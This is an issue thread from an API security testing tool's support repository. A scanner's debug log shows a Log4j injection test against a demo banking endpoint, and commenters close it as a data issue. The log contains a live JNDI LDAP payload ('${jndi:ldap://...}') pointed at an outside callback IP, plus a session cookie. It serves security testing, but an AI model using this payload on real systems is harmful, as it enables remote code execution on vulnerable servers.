### ISSUE TITLE
[Bug]: Log4j module is throwing sql error

### ISSUE THREAD

**Issue by intesar** [apisec-inc/Support#87]
### Severity

Blocker

### What happened?

06:56:16 [D] [AVBAPBPLInjection] : Endpoint [http://application.apisec.ai:8080/api/v1/bank-account]
06:56:16 [D] [AVBAPBPLInjection] : Method ["POST"]
06:56:16 [D] [AVBAPBPLInjection] : Authorization [Default]
06:56:16 [D] [AVBAPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**********]]]
06:56:16 [D] [AVBAPBPLInjection] : Request [{
  "accountBalance" : "1336319262",
  "accountNumber" : "1336319262",
  "createdBy" : "",
  "createdDate" : "",
  "id" : "",
  "inactive" : false,
  "modifiedBy" : "",
  "modifiedDate" : "",
  "user" : {
    "createdBy" : "",
    "createdDate" : "",
    "id" : "",
    "inactive" : false,
    "modifiedBy" : "",
    "modifiedDate" : "",
    "name" : "${jndi:ldap://20.83.254.17:4389/e42b9dda-7871-424e-8a02-63501287fdd6}",
    "version" : ""
  },
  "version" : ""
}]
06:56:16 [D] [AVBAPBPLInjection] : Status code [200]
06:56:16 [D] [AVBAPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=ZTFjMmEwNzQtNjUyYi00OGUzLTg0ZGUtZDYwZTEzZDFkZTdh; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Wed, 16 Feb 2022 06:56:16 GMT"]]
06:56:16 [D] [AVBAPBPLInjection] : Response [{
  "requestId" : "None",
  "requestTime" : "2022-02-16T06:56:16.931+0000",
  "errors" : true,
  "messages" : [ {
    "type" : "ERROR",
    "key" : "",
    "value" : "Unable to find com.fxlabs.issues.dao.entity.users.Users with id ; nested exception is javax.persistence.EntityNotFoundException: Unable to find com.fxlabs.issues.dao.entity.users.Users with id "
  } ],
  "data" : null,
  "totalPages" : 0,
  "totalElements" : 0
}]
06:56:16 [D] [AVBAPBPLInjection] : Response time [2222]
06:56:16 [D] [AVBAPBPLInjection] : Response size [367]
06:56:22 [E] [AVBAPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"e42b9dda-7871-424e-8a02-63501287fdd6","ip":"52.250.110.188","timestamp":"2022-02-16T06:56:16.814880Z"} == null] result [Failed]

**Comment by muqeetkhan20** [comment]
@intesar we had a discussion with the engineering on these exceptions at the time of log4j release, it was determined as data issues in net banking app by engineering - fyi

**Comment by Mohammed-Luqman-Shareef** [comment]
@jaleelsyed will be looking into it if there can be a way to avoid such errors and map to some existing user id in backend and return an OK response.

**Comment by muqeetkhan20** [comment]
As discussed in today's call, this is not a real-time bug. 
Closing the ticket.
